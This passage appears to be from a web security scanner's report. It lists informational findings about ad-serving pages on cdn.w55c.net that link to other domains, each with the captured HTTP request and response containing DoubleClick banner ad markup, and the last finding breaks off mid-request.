<A HREF="http://ad.doubleclick.net/jump/N4270.158901.DATAXU/B5279322.4;sz=160x600;pc=[TPAS_ID];ord=NERCNDQwODgwMDBEQTZGNTBBRTU4MEM5MjI4NzI3ODB8R0Z5UmlTRzhGNHwxMzAzNjU4NjM0OTIyfDF8MEY5OXBpbjNianwwUkRNZDJQcDU2fEVYXzEwMjM0NzcyMDZ8MzgwNjEx?">
<IMG SRC="http://ad.doubleclick.net/ad/N4270.158901.DATAXU/B5279322.4;sz=160x600;pc=[TPAS_ID];ord=NERCNDQwODgwMDBEQTZGNTBBRTU4MEM5MjI4NzI3ODB8R0Z5UmlTRzhGNHwxMzAzNjU4NjM0OTIyfDF8MEY5OXBpbjNianwwUkRNZDJQcDU2fEVYXzEwMjM0NzcyMDZ8MzgwNjEx?" BORDER=0 WIDTH=160 HEIGHT=600 ALT="Advertisement"></A>
...[SNIP]...

23.96. http://cdn.w55c.net/i/0RDMd2Pp56_1855871382.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0RDMd2Pp56_1855871382.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /i/0RDMd2Pp56_1855871382.html?rtbhost=rts-rr12.sldc.dataxu.net&btid=NERCNDQwMkQwMDA4RkExMDBBRTU3QjQ5MThBQjA3QkF8R0ZUaHhEMEVMQnwxMzAzNjU4NTQzNjM0fDF8MEY5OXBpbjNianwwUkRNZDJQcDU2fEVYXzEwMjM0NzcyMDZ8MzgxNTk5&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRALQAI-hAK5XtJGKsHuhilbCHDocZSZdL3wA&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEY5OXBpbjNiag&ciu=MFJETWQyUHA1Ng&reqid=NERCNDQwMkQwMDA4RkExMDBBRTU3QjQ5MThBQjA3QkE&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=381&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676544&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658544577&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658544581&frm=1&adk=2614322350&ga_vid=1063735003.1303658545&ga_sid=1303658545&ga_hid=467631587&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&eid=33895132&fu=4&ifi=1&dtd=7
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:22:23 GMT
Cache-Control: no-cache, no-store
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Date: Sun, 24 Apr 2011 15:12:52 GMT
Accept-Ranges: bytes
Last-Modified: Mon, 07 Mar 2011 14:26:38 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Pragma: no-cache
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 836

<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N4270.158901.DATAXU/B5279322.4;sz=160x600;pc=[TPAS_ID];ord=NERCNDQwMkQwMDA4RkExMDBBRTU3QjQ5MThBQjA3QkF8R0ZUaHhEMEVMQnwxMzAzNjU4NTQzNjM0fDF8MEY5OXBpbjNianwwUkRNZDJQcDU2fEVYXzEwMjM0NzcyMDZ8MzgxNTk5?">
</SCRIPT>
<NOSCRIPT>
<A HREF="http://ad.doubleclick.net/jump/N4270.158901.DATAXU/B5279322.4;sz=160x600;pc=[TPAS_ID];ord=NERCNDQwMkQwMDA4RkExMDBBRTU3QjQ5MThBQjA3QkF8R0ZUaHhEMEVMQnwxMzAzNjU4NTQzNjM0fDF8MEY5OXBpbjNianwwUkRNZDJQcDU2fEVYXzEwMjM0NzcyMDZ8MzgxNTk5?">
<IMG SRC="http://ad.doubleclick.net/ad/N4270.158901.DATAXU/B5279322.4;sz=160x600;pc=[TPAS_ID];ord=NERCNDQwMkQwMDA4RkExMDBBRTU3QjQ5MThBQjA3QkF8R0ZUaHhEMEVMQnwxMzAzNjU4NTQzNjM0fDF8MEY5OXBpbjNianwwUkRNZDJQcDU2fEVYXzEwMjM0NzcyMDZ8MzgxNTk5?" BORDER=0 WIDTH=160 HEIGHT=600 ALT="Advertisement"></A>
...[SNIP]...

23.97. http://cdn.w55c.net/i/0RDMd2Pp56_1855871382.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0RDMd2Pp56_1855871382.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /i/0RDMd2Pp56_1855871382.html?rtbhost=rts-rr12.sldc.dataxu.net&btid=NERCNDQwNkIwMDBDMDc5MTBBRTU4MzQ4MUE0NzIwQjd8R0Y4akFtdlVzNnwxMzAzNjU4NjA1ODQzfDF8MEY5OXBpbjNianwwUkRNZDJQcDU2fEVYXzEwMjM0NzcyMDZ8MjA0NTE1&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRAawAMB5EK5YNIGkcgtwSIa-YP3wHbrdXB1w&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEY5OXBpbjNiag&ciu=MFJETWQyUHA1Ng&reqid=NERCNDQwNkIwMDBDMDc5MTBBRTU4MzQ4MUE0NzIwQjc&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=204&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676606&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658606775&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658606780&frm=1&adk=2614322350&ga_vid=1570881348.1303658607&ga_sid=1303658607&ga_hid=1994203513&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=9
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:23:25 GMT
Cache-Control: no-cache, no-store
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Date: Sun, 24 Apr 2011 15:12:52 GMT
Pragma: no-cache
Accept-Ranges: bytes
Last-Modified: Mon, 07 Mar 2011 14:26:38 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 836

<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N4270.158901.DATAXU/B5279322.4;sz=160x600;pc=[TPAS_ID];ord=NERCNDQwNkIwMDBDMDc5MTBBRTU4MzQ4MUE0NzIwQjd8R0Y4akFtdlVzNnwxMzAzNjU4NjA1ODQzfDF8MEY5OXBpbjNianwwUkRNZDJQcDU2fEVYXzEwMjM0NzcyMDZ8MjA0NTE1?">
</SCRIPT>
<NOSCRIPT>
<A HREF="http://ad.doubleclick.net/jump/N4270.158901.DATAXU/B5279322.4;sz=160x600;pc=[TPAS_ID];ord=NERCNDQwNkIwMDBDMDc5MTBBRTU4MzQ4MUE0NzIwQjd8R0Y4akFtdlVzNnwxMzAzNjU4NjA1ODQzfDF8MEY5OXBpbjNianwwUkRNZDJQcDU2fEVYXzEwMjM0NzcyMDZ8MjA0NTE1?">
<IMG SRC="http://ad.doubleclick.net/ad/N4270.158901.DATAXU/B5279322.4;sz=160x600;pc=[TPAS_ID];ord=NERCNDQwNkIwMDBDMDc5MTBBRTU4MzQ4MUE0NzIwQjd8R0Y4akFtdlVzNnwxMzAzNjU4NjA1ODQzfDF8MEY5OXBpbjNianwwUkRNZDJQcDU2fEVYXzEwMjM0NzcyMDZ8MjA0NTE1?" BORDER=0 WIDTH=160 HEIGHT=600 ALT="Advertisement"></A>
...[SNIP]...

23.98. http://cdn.w55c.net/i/0RES95J3Zo_918427505.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0RES95J3Zo_918427505.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /i/0RES95J3Zo_918427505.html?rtbhost=rts-rr18.sldc.dataxu.net&btid=NERCNDQwMTEwMDA3M0ZBMTBBRTU3RTQ3MURFMTYzMzN8R0Y2VkdlZW5ncnwxMzAzNjU4NTE1NTAxfDF8MEZNQXp6YTk2dHwwUkVTOTVKM1pvfEVYXzEwMjM0NzcyMDZ8ODY2NDgz&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRAEQAHP6EK5X5HHeFjM058SIacGTDQNRf0Tg&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZNQXp6YTk2dA&ciu=MFJFUzk1SjNabw&reqid=NERCNDQwMTEwMDA3M0ZBMTBBRTU3RTQ3MURFMTYzMzM&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=866&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676516&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658516462&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658516467&frm=1&adk=2614322350&ga_vid=1758961832.1303658516&ga_sid=1303658516&ga_hid=2008436335&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=8
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:29:39 GMT
Cache-Control: no-cache, no-store
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Mon, 28 Feb 2011 21:20:22 GMT
Date: Sun, 24 Apr 2011 14:52:24 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Pragma: no-cache
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 1248

<IFRAME SRC="http://ad.doubleclick.net/adi/N4270.158901.DATAXU/B5279302.4;sz=160x600;pc=[TPAS_ID];ord=NERCNDQwMTEwMDA3M0ZBMTBBRTU3RTQ3MURFMTYzMzN8R0Y2VkdlZW5ncnwxMzAzNjU4NTE1NTAxfDF8MEZNQXp6YTk2dHwwUkVTOTVKM1pvfEVYXzEwMjM0NzcyMDZ8ODY2NDgz?" WIDTH=160 HEIGHT=600 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N4270.158901.DATAXU/B5279302.4;abr=!ie;sz=160x600;pc=[TPAS_ID];ord=NERCNDQwMTEwMDA3M0ZBMTBBRTU3RTQ3MURFMTYzMzN8R0Y2VkdlZW5ncnwxMzAzNjU4NTE1NTAxfDF8MEZNQXp6YTk2dHwwUkVTOTVKM1pvfEVYXzEwMjM0NzcyMDZ8ODY2NDgz?">
</SCRIPT>
<NOSCRIPT>
<A HREF="http://ad.doubleclick.net/jump/N4270.158901.DATAXU/B5279302.4;abr=!ie4;abr=!ie5;sz=160x600;pc=[TPAS_ID];ord=NERCNDQwMTEwMDA3M0ZBMTBBRTU3RTQ3MURFMTYzMzN8R0Y2VkdlZW5ncnwxMzAzNjU4NTE1NTAxfDF8MEZNQXp6YTk2dHwwUkVTOTVKM1pvfEVYXzEwMjM0NzcyMDZ8ODY2NDgz?">
<IMG SRC="http://ad.doubleclick.net/ad/N4270.158901.DATAXU/B5279302.4;abr=!ie4;abr=!ie5;sz=160x600;pc=[TPAS_ID];ord=NERCNDQwMTEwMDA3M0ZBMTBBRTU3RTQ3MURFMTYzMzN8R0Y2VkdlZW5ncnwxMzAzNjU4NTE1NTAxfDF8MEZNQXp6YTk2dHwwUkVTOTVKM1pvfEVYXzEwMjM0NzcyMDZ8ODY2NDgz?" BORDER=0 WIDTH=160 HEIGHT=600 ALT="Advertisement"></A>
...[SNIP]...

23.99. http://cdn.w55c.net/i/0REyoPRMSz_696710848.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0REyoPRMSz_696710848.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /i/0REyoPRMSz_696710848.html?rtbhost=rts-rr12.sldc.dataxu.net&btid=NERCNDNGRkEwMDBFMDk4MTBBRTU3NzUwMjNGNDVBMEN8R0Zmd0tBcHhIeHwxMzAzNjU4NDkyOTk5fDF8MEY2WXJBQmRPUHwwUkV5b1BSTVN6fEVYXzEwMjM0NzcyMDZ8NDIwNDQw&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbQ_-gAOCYEK5XdQI_RaDCZm9H-nfhLkah7veg&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEY2WXJBQmRPUA&ciu=MFJFeW9QUk1Teg&reqid=NERCNDNGRkEwMDBFMDk4MTBBRTU3NzUwMjNGNDVBMEM&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=420&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=90&slotname=9524956792&w=728&lmt=1303676493&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658493907&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303658493914&frm=1&adk=513358139&ga_vid=1738821208.1303658494&ga_sid=1303658494&ga_hid=1857389626&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3961147505&fu=4&ifi=1&dtd=9
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:26:07 GMT
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Mon, 04 Apr 2011 01:04:45 GMT
Date: Sun, 24 Apr 2011 15:25:35 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 6961

<IFRAME SRC="http://ad.doubleclick.net/adi/N553.158901.DATAXU/B4970757.16;sz=728x90;pc=[TPAS_ID];ord=NERCNDNGRkEwMDBFMDk4MTBBRTU3NzUwMjNGNDVBMEN8R0Zmd0tBcHhIeHwxMzAzNjU4NDkyOTk5fDF8MEY2WXJBQmRPUHwwUkV5b1BSTVN6fEVYXzEwMjM0NzcyMDZ8NDIwNDQw?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N553.158901.DATAXU/B4970757.16;abr=!ie;sz=728x90;pc=[TPAS_ID];ord=NERCNDNGRkEwMDBFMDk4MTBBRTU3NzUwMjNGNDVBMEN8R0Zmd0tBcHhIeHwxMzAzNjU4NDkyOTk5fDF8MEY2WXJBQmRPUHwwUkV5b1BSTVN6fEVYXzEwMjM0NzcyMDZ8NDIwNDQw?">
</SCRIPT>
<NOSCRIPT>
<A HREF="http://ad.doubleclick.net/jump/N553.158901.DATAXU/B4970757.16;abr=!ie4;abr=!ie5;sz=728x90;pc=[TPAS_ID];ord=NERCNDNGRkEwMDBFMDk4MTBBRTU3NzUwMjNGNDVBMEN8R0Zmd0tBcHhIeHwxMzAzNjU4NDkyOTk5fDF8MEY2WXJBQmRPUHwwUkV5b1BSTVN6fEVYXzEwMjM0NzcyMDZ8NDIwNDQw?">
<IMG SRC="http://ad.doubleclick.net/ad/N553.158901.DATAXU/B4970757.16;abr=!ie4;abr=!ie5;sz=728x90;pc=[TPAS_ID];ord=NERCNDNGRkEwMDBFMDk4MTBBRTU3NzUwMjNGNDVBMEN8R0Zmd0tBcHhIeHwxMzAzNjU4NDkyOTk5fDF8MEY2WXJBQmRPUHwwUkV5b1BSTVN6fEVYXzEwMjM0NzcyMDZ8NDIwNDQw?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A>
...[SNIP]...

23.100. http://cdn.w55c.net/i/0REyoPRMSz_696710848.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0REyoPRMSz_696710848.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /i/0REyoPRMSz_696710848.html?rtbhost=rts-rr17.sldc.dataxu.net&btid=NERCNDQwMDMwMDA1QTE4NTBBRTU3Nzk1MjEwQTZFOEN8R0ZmOHpVb1hiV3wxMzAzNjU4NTAxNDIyfDF8MEY2WXJBQmRPUHwwUkV5b1BSTVN6fEVYXzEwMjM0NzcyMDZ8MzMxNjU1&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRAAwAFoYUK5XeVIQpujIjD7cILBOkoQIpRdg&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEY2WXJBQmRPUA&ciu=MFJFeW9QUk1Teg&reqid=NERCNDQwMDMwMDA1QTE4NTBBRTU3Nzk1MjEwQTZFOEM&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=331&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=90&slotname=9524956792&w=728&lmt=1303676502&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658502354&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658502359&frm=1&adk=513358139&ga_vid=2102368488.1303658502&ga_sid=1303658502&ga_hid=1386538034&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3961147505&fu=4&ifi=1&dtd=7
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:21:40 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Date: Sun, 24 Apr 2011 15:19:55 GMT
Accept-Ranges: bytes
Last-Modified: Mon, 04 Apr 2011 01:04:45 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 6961

<IFRAME SRC="http://ad.doubleclick.net/adi/N553.158901.DATAXU/B4970757.16;sz=728x90;pc=[TPAS_ID];ord=NERCNDQwMDMwMDA1QTE4NTBBRTU3Nzk1MjEwQTZFOEN8R0ZmOHpVb1hiV3wxMzAzNjU4NTAxNDIyfDF8MEY2WXJBQmRPUHwwUkV5b1BSTVN6fEVYXzEwMjM0NzcyMDZ8MzMxNjU1?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N553.158901.DATAXU/B4970757.16;abr=!ie;sz=728x90;pc=[TPAS_ID];ord=NERCNDQwMDMwMDA1QTE4NTBBRTU3Nzk1MjEwQTZFOEN8R0ZmOHpVb1hiV3wxMzAzNjU4NTAxNDIyfDF8MEY2WXJBQmRPUHwwUkV5b1BSTVN6fEVYXzEwMjM0NzcyMDZ8MzMxNjU1?">
</SCRIPT>
<NOSCRIPT>
<A HREF="http://ad.doubleclick.net/jump/N553.158901.DATAXU/B4970757.16;abr=!ie4;abr=!ie5;sz=728x90;pc=[TPAS_ID];ord=NERCNDQwMDMwMDA1QTE4NTBBRTU3Nzk1MjEwQTZFOEN8R0ZmOHpVb1hiV3wxMzAzNjU4NTAxNDIyfDF8MEY2WXJBQmRPUHwwUkV5b1BSTVN6fEVYXzEwMjM0NzcyMDZ8MzMxNjU1?">
<IMG SRC="http://ad.doubleclick.net/ad/N553.158901.DATAXU/B4970757.16;abr=!ie4;abr=!ie5;sz=728x90;pc=[TPAS_ID];ord=NERCNDQwMDMwMDA1QTE4NTBBRTU3Nzk1MjEwQTZFOEN8R0ZmOHpVb1hiV3wxMzAzNjU4NTAxNDIyfDF8MEY2WXJBQmRPUHwwUkV5b1BSTVN6fEVYXzEwMjM0NzcyMDZ8MzMxNjU1?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A>
...[SNIP]...

23.101. http://cdn.w55c.net/i/0RFFcWpaTN_954073853.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0RFFcWpaTN_954073853.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /i/0RFFcWpaTN_954073853.html?rtbhost=rts-rr15.sldc.dataxu.net&btid=NERCNDQwMTEwMDA4MTBBRDBBRTU4MzRDMzhCQTFCRjV8R0Z1djIzNkVXbHwxMzAzNjU4NTE2OTM4fDF8MEZGeVp3NFpBSnwwUkZGY1dwYVROfEVYXzEwMjM0NzcyMDZ8NTAzNjI2&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRAEQAIEK0K5YNMOLob9Z6R4rJH8FZ3KUYu1A&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZGeVp3NFpBSg&ciu=MFJGRmNXcGFUTg&reqid=NERCNDQwMTEwMDA4MTBBRDBBRTU4MzRDMzhCQTFCRjU&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=503&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=90&slotname=9524956792&w=728&lmt=1303676516&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658516518&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658516523&frm=1&adk=513358139&ga_vid=1030430259.1303658517&ga_sid=1303658517&ga_hid=340899808&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3961147505&fu=4&ifi=1&dtd=8
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
